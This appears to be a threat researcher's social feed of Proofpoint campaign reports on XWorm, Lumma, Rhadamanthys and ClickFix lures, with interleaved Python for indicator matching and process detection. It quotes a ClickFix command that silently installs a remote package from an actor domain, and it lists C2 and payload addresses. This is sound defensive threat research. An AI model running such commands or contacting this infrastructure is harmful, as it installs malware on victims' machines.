Tommy M (TheAnalyst)

206 Followers
44 Following
8 Posts
Threat Researcher @proofpoint | @Cryptolaemus1
https://twitter.com/ffforward
Would you run AdobeReader.exe from a days-old company called "TrustConnect Software PTY LTD" just because they managed to purchase an Extended Validation certificate?
It turns out this "vibe-coded" platform wasn't a legitimate RMM; it was Malware-as-a-Service sold to criminals for $300 per month.
From fake incorporation to disruption by partners in under a month. The full blog is out now with me, @selenalarson and the rest of the @proofpoint @threatinsight team.
https://www.proofpoint.com/us/blog/threat-insight/dont-trustconnect-its-a-rat

Since 14 October, we’ve tracked a high-volume XWorm campaign targeting Germany. The activity is attributed to TA584, a sophisticated #cybercrime group tracked since 2020.

Messages are sent from hundreds of compromised sender accounts impersonating ELSTER and contain malicious URLs.

These URLs are either attacker-controlled URLs hosted on compromised websites, AWS-hosted URLs that redirect to those same sites, or unique Trend Micro click-time protection URLs that redirect to the AWS URLs. Proofpoint has notified Trend Micro about the potential abuse.

The compromised websites redirect the user to the attacker-controlled domain, which performs IP filtering. If passed, the visitor is redirected to the LP which contains a matching themed page with a "Slide" CAPTCHA. If the CAPTCHA is resolved, a ClickFix page guides users to follow instructions.

If the ClickFix instructions are followed, it will execute a remote PowerShell script that disables AMSI, loads a memory‑only .NET loader (included in the script) which injects an XWorm payload into RegSvcs.exe, clears the clipboard, and exits.

The user is redirected to a legit website if the ClickFix command is successful. This is done via a server-side check (most likely based on IP) and the response to a POST to https[:]//[InvolvedHostName][.]top/api/exe.

Proofpoint tracks this variant of XWorm as “P0WER” because it uses this string as the AES key. This variant always uses SharpHide for persistence by setting up a hidden registry key that will execute another remote PowerShell script on each boot to run XWorm again.

Proofpoint assesses TA584 is an initial access provider whose compromises can lead to #ransomware.

Historically, this actor focused on North America and the UK. TA584 expanded its targeting to include European entities including Germany since 1 July 2025.

---

Landing page: hxxps://www[.]eportal-npa[.]elster-de[.]quick-print[.]top/ePortal/ or hxxps://www[.]npa-eportal[.]digital-service[.]elster-de[.]status-drive[.]top/ePortal/

Click Payload: hxxp://94[.]159[.]113[.]37/ssd.png | b6956f45bd3c7b3009a31f0caf087d0686e60ee96978766a9f6477b8b093eace

XWorm C2: 85[.]208[.]84[.]208:4411

SharpHide Payload: 85[.]208[.]84[.]208/x.jpg

Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues.

The comment includes either a link to the actor-controlled domain droplink[.]digital, a Dropbox URL, or a file attached directly to the issue (which creates a link to the file hosted on GitHub). They claim to provide a fix for the reported problem. People who get these emails may include: the issue creator, the repository owner, the issue assignee, or any watchers.

The downloaded file is always named “fix.zip”, which contains “x86_64-w64-ranlib.exe” and “msvcp140.dll”. If the executable is run, it launches #Lumma via “msbuild.exe”.

The hash of the executable (and therefore the ZIP file) may vary depending on when the Lumma payload was built. Example:

File name: fix.zip

Retrieved From: hxxps://objects[.]githubusercontent[.]com/github-production-repository-file-5c1aeb/195216627/22101425?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20250903%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250903T111859Z&X-Amz-Expires=300&X-Amz-Signature=f0cd8226472614321e6b9e3b883bffe0adf9d9255af1207374947ea71d3c8f76&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dfix.zip&response-content-type=application%2Fx-zip-compressed

MD5: 4d8730a2f3388d018b7793f03fb79464

SHA1: cbc5b2181854a2672013422e02df9ea35c3c9e1c

SHA256: c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839

Although GitHub has removed some of the malicious comments, the links in the messages remained active as of September 3, including the actor-controlled URLs.

On September 2-3, some of the files attached to the issues had random file names and were encrypted. While they contained an executable with the same name, the threat actor did not provide the password for these files, so they could not be extracted and did not lead to any malware installation.
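Both the TA584/XWorm post and the GitHub-delivered Lumma post above publish their indicators in defanged form (hxxp, [.], [:]). The following Python is an added example, not code from the posts or from Proofpoint: it refangs those indicators into a watchlist and runs a few constructed proxy, firewall and EDR log lines against it. The indicator values are the ones quoted in the two posts; the log lines, field names and the 10.x source addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Defanged indicators copied from the two posts above (TA584/XWorm and the
# GitHub-delivered Lumma campaign), in the defanging style the posts use.
DEFANGED_IOCS = {
    "url": [
        "hxxps://www[.]eportal-npa[.]elster-de[.]quick-print[.]top/ePortal/",
        "hxxps://www[.]npa-eportal[.]digital-service[.]elster-de[.]status-drive[.]top/ePortal/",
        "hxxp://94[.]159[.]113[.]37/ssd.png",
        "85[.]208[.]84[.]208/x.jpg",
    ],
    "socket": ["85[.]208[.]84[.]208:4411"],
    "domain": ["droplink[.]digital"],
    "sha256": [
        "b6956f45bd3c7b3009a31f0caf087d0686e60ee96978766a9f6477b8b093eace",
        "c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839",
    ],
}


def refang(value: str) -> str:
    """Undo the defanging conventions used in the posts (hxxp://, [.], [:])."""
    out = value.strip()
    out = re.sub(r"^hxxp(s?)://", r"http\1://", out, flags=re.IGNORECASE)
    out = out.replace("[:]//", "://")
    for fake_dot in ("[.]", "(.)", "{.}"):
        out = out.replace(fake_dot, ".")
    return out


def build_watchlist(iocs: dict) -> dict:
    """Normalise the indicators into sets that are cheap to match against."""
    hosts, sockets, hashes = set(), set(), set()
    for url in iocs.get("url", []):
        clean = refang(url)
        if "://" not in clean:          # bare host/path entries such as 85.208.84.208/x.jpg
            clean = "http://" + clean
        hosts.add(urlsplit(clean).hostname.lower())
    for sock in iocs.get("socket", []):
        clean = refang(sock).lower()
        sockets.add(clean)
        hosts.add(clean.rsplit(":", 1)[0])   # the C2 address on any port is also worth a hit
    for dom in iocs.get("domain", []):
        hosts.add(refang(dom).lower())
    for digest in iocs.get("sha256", []):
        hashes.add(digest.lower())
    return {"hosts": hosts, "sockets": sockets, "hashes": hashes}


# Token extractors for free-form log lines.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
SOCKET_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}:\d{1,5})\b")
SHA256_RE = re.compile(r"\b([0-9a-f]{64})\b", re.IGNORECASE)


def scan_line(line: str, watch: dict) -> list:
    """Return (kind, value) hits for one log line; an empty list means no match."""
    hits = []
    for host in HOST_RE.findall(line) + IP_RE.findall(line):
        h = host.lower()
        # exact host, or a subdomain of a watched host
        if h in watch["hosts"] or any(h.endswith("." + w) for w in watch["hosts"]):
            hits.append(("host", h))
    for sock in SOCKET_RE.findall(line):
        if sock in watch["sockets"]:
            hits.append(("socket", sock))
    for digest in SHA256_RE.findall(line):
        if digest.lower() in watch["hashes"]:
            hits.append(("sha256", digest.lower()))
    return hits


def scan_logs(lines, watch: dict) -> list:
    """Return [(line_number, hits)] for lines that matched at least one indicator."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := scan_line(line, watch))]


# Constructed sample telemetry (proxy, firewall, EDR); not real customer data.
SAMPLE_LOGS = [
    "2025-10-20T09:14:02Z proxy src=10.1.2.3 url=https://www.eportal-npa.elster-de.quick-print.top/ePortal/ status=200",
    "2025-10-20T09:14:31Z proxy src=10.1.2.3 url=http://94.159.113.37/ssd.png status=200",
    "2025-10-20T09:15:10Z fw src=10.1.2.3 dst=85.208.84.208:4411 action=allow",
    "2025-10-20T11:02:55Z edr host=WS-42 file=fix.zip sha256=c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839",
    "2025-10-20T11:03:00Z proxy src=10.1.2.9 url=https://www.example.com/index.html status=200",
]

WATCHLIST = build_watchlist(DEFANGED_IOCS)

if __name__ == "__main__":
    for lineno, hits in scan_logs(SAMPLE_LOGS, WATCHLIST):
        print(f"line {lineno}: {hits}")
```

The subdomain check matters for the TA584 landing pages, which sit several labels deep under throwaway .top domains; matching on the exact host alone would miss a sibling host on the same domain. Hash matching is deliberately last and weakest here, since the Lumma post notes the executable (and therefore the ZIP) hash changes with each build.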

Proofpoint identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys.

We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. https://infosec.exchange/@anyrun_app/115019769476243964

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they have been tagged, with the text from the issue.

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to verify they are human.

Following the instructions will initiate a command that downloads and executes malware.

The specific malware may vary throughout the campaign.

At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.

Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject.

CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.

CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2

Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com

Organizations are encouraged to restrict PowerShell to only approved administrative users.

This article that is starting to get traction claims that the official RVTools website was distributing a malicious installer leading to Bumblebee. I see zero evidence of this actually being the case.
There are, however, at least two separate current malvertising/SEO campaigns, one leading to Bumblebee and one leading to SMOKEDHAM/Thundershell, but it's not from the official website.

⚠️ Proofpoint researchers have identified an increase in the unique #socialengineering technique called #ClickFix. ⚠️

The technique is being used by financially motivated threat actors and reportedly by suspected espionage-focused groups.

Read the security brief: https://ow.ly/WYXX50U9eZq

---

How the lure works: The #ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.

Notably, we've observed threat actors using a fake CAPTCHA-themed lure that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check.

This activity leverages a toolkit named reCAPTCHA Phish, released by a security researcher on GitHub for educational purposes.

Just days after the open-source toolkit was released on GitHub, Proofpoint began observing it in email threat data.

See our security brief for several recent examples of the ClickFix technique in action.

ClickFix Malware & Social Engineering Threat Grows | Proofpoint US

Learn how the threat of ClickFix malware is spreading through social engineering. Find out how to protect yourself from these attacks with Proofpoint.

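The Rhadamanthys post above quotes the ClickFix command as `msiexec /i <url> /qn`, the XWorm post describes a remote PowerShell script that ends up in RegSvcs.exe, and the Rhadamanthys post closes by recommending that PowerShell be restricted to approved administrative users. As an added example that is not code from the posts or from Proofpoint, the Python below turns those three observations into a small triage over process-creation events. The event field names, the approved-user list, the placeholder host lure.invalid and the assumption that the loader starts RegSvcs.exe as a child of PowerShell are all mine for this example, and the sample events are constructed.

```python
import re

# Process-creation telemetry reduced to one dict per event. The field names are an
# assumption for this example; map them from your EDR or from Sysmon Event ID 1.
# Users allowed to run PowerShell (assumed policy list, per the post's recommendation).
APPROVED_POWERSHELL_USERS = {"corp\\svc-admin"}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# "msiexec /i <url> /qn" is the ClickFix command quoted in the Rhadamanthys post.
MSIEXEC_REMOTE_RE = re.compile(r'(?i)[/-]i\s+"?https?://')
MSIEXEC_QUIET_RE = re.compile(r"(?i)(?:^|\s)[/-]q[nb]?\b")
URL_RE = re.compile(r"(?i)https?://")


def detect(event: dict, approved_users=APPROVED_POWERSHELL_USERS) -> list:
    """Return the names of every rule an event triggers (empty list = nothing flagged)."""
    image = event["image"].lower()
    parent = event.get("parent_image", "").lower()
    cmd = event.get("command_line", "")
    user = event.get("user", "").lower()
    findings = []

    # Rule 1: msiexec installing a package straight from a URL, silently.
    if image == "msiexec.exe" and MSIEXEC_REMOTE_RE.search(cmd) and MSIEXEC_QUIET_RE.search(cmd):
        findings.append("msiexec_remote_quiet_install")

    if image in POWERSHELL_IMAGES:
        # Rule 2: PowerShell handed a remote script location on its command line
        # (both the XWorm and the Rhadamanthys chains start with a remote script).
        if URL_RE.search(cmd):
            findings.append("powershell_remote_url")
        # Rule 3: the post's recommendation, PowerShell limited to approved users.
        if user not in approved_users:
            findings.append("powershell_unapproved_user")

    # Rule 4: RegSvcs.exe (the injection target named in the XWorm post) spawned by
    # PowerShell. Assumption: the in-memory loader starts RegSvcs.exe as a child process.
    if image == "regsvcs.exe" and parent in POWERSHELL_IMAGES:
        findings.append("regsvcs_child_of_powershell")

    return findings


def triage(events, approved_users=APPROVED_POWERSHELL_USERS) -> list:
    """Run detect() over a batch; one findings list per event, in input order."""
    return [detect(e, approved_users) for e in events]


# Constructed sample events (not real telemetry); lure.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"user": "CORP\\alice", "parent_image": "explorer.exe", "image": "msiexec.exe",
     "command_line": "msiexec /i https://lure.invalid /qn"},
    {"user": "CORP\\alice", "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": 'powershell -NoProfile -Command "Invoke-WebRequest https://lure.invalid/x.ps1"'},
    {"user": "CORP\\alice", "parent_image": "powershell.exe", "image": "RegSvcs.exe",
     "command_line": "RegSvcs.exe"},
    {"user": "CORP\\svc-admin", "parent_image": "cmd.exe", "image": "powershell.exe",
     "command_line": "powershell -File C:\\scripts\\inventory.ps1"},
    {"user": "CORP\\alice", "parent_image": "explorer.exe", "image": "msiexec.exe",
     "command_line": "msiexec /i C:\\installers\\app.msi /qn"},
]

if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{event['image']:<15} {findings or 'nothing flagged'}")
```

Rule 3 is the enforcement-side check: in a shop where PowerShell really is restricted to named administrators, any PowerShell start by another account is itself the alert, regardless of what the command line says. The other three rules are there for environments that cannot yet restrict PowerShell and have to fall back on spotting the ClickFix commands themselves; the local `msiexec /i C:\...\app.msi /qn` event stays unflagged so that ordinary software deployment does not drown the signal.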

New research from @Ffforward and me looking at the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations.

They always pop up during tax season in the US and use lures with funny back stories (help! my last accountant messed up my taxes).

https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax

Security Brief: ‘Tis the Season for Tax Hax  | Proofpoint US

What happened  Proofpoint researchers recently identified the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations. T...
